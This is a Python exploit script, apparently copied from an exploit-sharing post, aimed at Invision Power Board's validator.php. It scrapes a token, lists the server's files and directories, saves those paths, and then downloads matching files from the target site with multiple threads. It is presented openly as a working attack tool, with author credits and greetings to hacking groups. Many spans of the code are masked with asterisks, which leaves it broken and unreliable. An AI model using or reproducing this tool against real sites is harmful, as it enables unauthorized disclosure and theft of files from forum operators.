#! /usr/bin/env python3.1
################################################################
# _____ _____ ____ (validator.php) #
# |_ _| __ \| _ \ #
# | | | |__) | |_) | #
# | | | ___/| _ < #
# _| |_| | | |_) | #
# |_____|_| |____/ #
# @expl0it... #
################################################################
# [ IPB Files / Directories Full Disclosure ] #
# [ Vuln discovered by TinKode / xpl0it written by cmiN ] #
# [ Greetz: insecurity.ro, darkc0de.com ] #
################################################################
# #
# Special thanks for: cmiN #
# www.TinKode.BayWords.com #
################################################################
|
|
#! /usr/bin/env python3.1
################################################################
# _____ _____ ____ (validator.php) #
# |_ _| __ \| _ \ #
# | | | |__) | |_) | #
# | | | ___/| _ < #
# _| |_| | | |_) | #
# |_____|_| |____/ #
# @expl0it... #
################################################################
# [ IPB Files / Directories Full Disclosure ] #
# [ Vuln discovered by TinKode / xpl0it written by cmiN ] #
# [ Greetz: insecurity.ro, darkc0de.com ] #
################################################################
# #
# Special thanks for: cmiN #
# www.TinKode.BayWords.com #
################################################################
import os, sys, urllib.request, urllib.parse, threading
def main():
logo = """
\t |---------------------------------------------------------------|
\t | _____ _____ ____ (TM) |
\t | |_ _| __ \| _ \ |
\t | | | | |__) | |_) | |
\t | | | | ___/| _ < |
\t | _| |_| | | |_) | |
\t | |_____|_| |____/ |
\t | |
\t | |
\t | IPB Full Disclosure expl0it |
\t | Written by cmiN |
\t | Vulnerability discovered by TinKode |
\t | |
\t | |
\t | Visit: www.insecurity.ro & www.darkc0de.com |
\t |---------------------------------------------------------------|
"""
usage = """
|---------------------------------------------------------------|
|Usage: ipbfd.py scan http://www.site.com/IPB_folder |
| ipbfd.py download *.zip -> all |
| ipbfd.py download name.jpg -> one |
|---------------------------------------------------------------|"""
if sys.platform in ("linux", "linux2"):
clearing = "clear"
else:
clearing = "cls"
os.system(clearing)
print(logo)
args = sys.argv
if len(********) == 3:
try:
print("Please wait...")
if args[1] == "********":
extract_parse_save(********))
elif args[1] == "********":
download_data(********])
except Exception as message:
print("An error occurred: ********))
except:
print("Unknown error.")
else:
print(********")
else:
print(usage)
input()
def extract_parse_save(url):
print("[+]Extracting content...")
hurl = url + "/validator.php"
with ********.********) as usock:
source = usock.read().decode()
print("[+]Finding token...")
word = "validate('"
index = source.find(word)
if index != -1:
source = source[********):]
value = source[:source.index(********)]
hurl = url ********.format(********)
else:
print("[!]Token not found.")
print("[+]********...")
with urllib.request.******** as usock:
lastk, lastv = None, None
dictionary = dict()
for line in usock:
line = line.decode()
index = line.find(********)
if index != -1:
lastk = line[index + ********" ").strip(********)
index = line.find(********")
if index != -1:
lastv = line[index + ********:line.index("********")].********(" ")
if lastk != None and lastv != None:
index = ********")
if index in (********, 0):
lastk = "[other] {}".format(lastk)
else:
lastk = "[********}".format(********)
dictionary[********astv
******** = None, None
print("[+]Organizing and saving paths...")
with open("********", "********") as fout:
fout.write(********)
keys = sorted(********)
for key in keys:
fout.write(********))
def download_data(files):
print("[+]Searching ********...")
mthreads = ********
with open(********) as fin:
url = fin.readline()********)
if files.find("*") == -1:
hurl = ********)
Download(hurl).start()
else:
ext = files[files.********]
for line in fin:
pieces = l********)
if pieces[0].count(ext) == 1:
upath = pieces[1]
hurl = ********)
while threading.active********reads:
pass
Download(********)
while threading.active_count(********
pass
class Download(********):
def __********):
threading.Thread.********)
******** = url
def run(self):
try:
with urllib.request.urlopen(********usock:
data = ********)
uparser = urllib.parse.urlparse(********)
pieces = uparser.********)
******** = pieces[********]
with open(********) as fout:
fout.********)
except:
pass
********__main__":
main()
|
|
You must have python 3.1 to work!
Posts
